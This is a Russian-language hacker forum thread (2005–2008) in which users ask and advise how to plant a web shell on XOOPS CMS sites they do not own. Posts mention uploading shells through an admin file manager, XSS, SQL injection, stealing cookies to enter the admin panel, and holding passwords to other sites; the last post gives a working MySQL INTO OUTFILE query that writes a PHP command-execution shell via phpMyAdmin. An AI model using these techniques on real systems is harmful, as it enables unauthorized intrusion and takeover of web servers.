Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

24.11.2005, 01:15
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме: 4520553
Репутация:
1316
|
|
шелл через xoops
вообщем, кто подкажет как залить шелл через xoops?
я с ним не сталкивался, поэтому спрашиваю здесь, мож кто знает?
|
|
|

28.11.2005, 13:18
|
|
Участник форума
Регистрация: 07.03.2005
Сообщений: 160
Провел на форуме: 418635
Репутация:
30
|
|
в мемберки была тема про хупс! там его как нех ломали!
|
|
|

28.11.2005, 15:04
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме: 5957900
Репутация:
561
|
|
Сообщение от k1b0rg
вообщем, кто подкажет как залить шелл через xoops?
я с ним не сталкивался, поэтому спрашиваю здесь, мож кто знает?
Я выкладывал вроде пару шеллов на xoops. Где то ещё пассы на пару сайтов валяются. В общем там всё время подключены разные модули. Ни одного одинакового сайта пока не видел. Я заливал с подключеным файл-менеджером, а без менеджера пока руки не дошли, собственно и не пробовал сильно. Эт, скинь линк и пас в личку, придумаем может что-нибудь.
Tut odin iz nix, moget pomoget http://forum.antichat.ru/showthread.php?p=75562
Последний раз редактировалось Azazel; 28.11.2005 в 15:26..
|
|
|

29.11.2005, 07:42
|
|
Banned
Регистрация: 11.09.2005
Сообщений: 254
Провел на форуме: 1002567
Репутация:
-12
|
|
new_bb стоит? если да то там хсс должна быть
sql-inj на safety-lab.com посмотри
я через форум ломал щас хупс вроде как Run CMs все также осталось там
в админку без пароля только куки украсть
----------
2азазель ето где *.php.ns ты так делал?
ето некатит уже
а вообще больше всего уязвимостей на их форуме
они постоянно там выкладывабт как их сломали логи и т.д. чтобы админы заплатки сделали
Последний раз редактировалось africanec; 29.11.2005 в 07:45..
|
|
|

29.11.2005, 13:00
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме: 5957900
Репутация:
561
|
|
Я ж грю. В админке сайта был какой то дурацкий файловый менеджер через который можно было закачивать файлы только в одну папку, типа site.com/xoops/eta/dalekaya/papka/blablabla/tatata/shell.php Я ещё заколебался её искать. Потом я нашёл ещё штук пять таких xopsoв, но админки были одна не похожа на другую и менеджера такого я больше не видел. И форумы тоже там разные были прилеплены.
|
|
|

30.04.2007, 17:22
|
|
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме: 1106266
Репутация:
366
|
|
столкнулся с этой проблемой(, мож её уже решили, как можно залить шелл из админки.
|
|
|

28.03.2008, 16:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Если, кто решил эту проблему (залить shell из админки xoops ) отпишитесь плиз...
|
|
|
|

28.03.2008, 16:48
|
|
Banned
Регистрация: 09.12.2007
Сообщений: 301
Провел на форуме: 1796349
Репутация:
174
|
|
идешь в phpmyadmin по стандарту рут
и ебашишь sql запросов вот эту хню
SELECT '<? system("$_GET[cmd]"); ?>' FROM mysql.user INTO OUTFILE 'дира до файла'
или можешь залить полноценный шелл тока замени ' на " во всем сшеле...
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|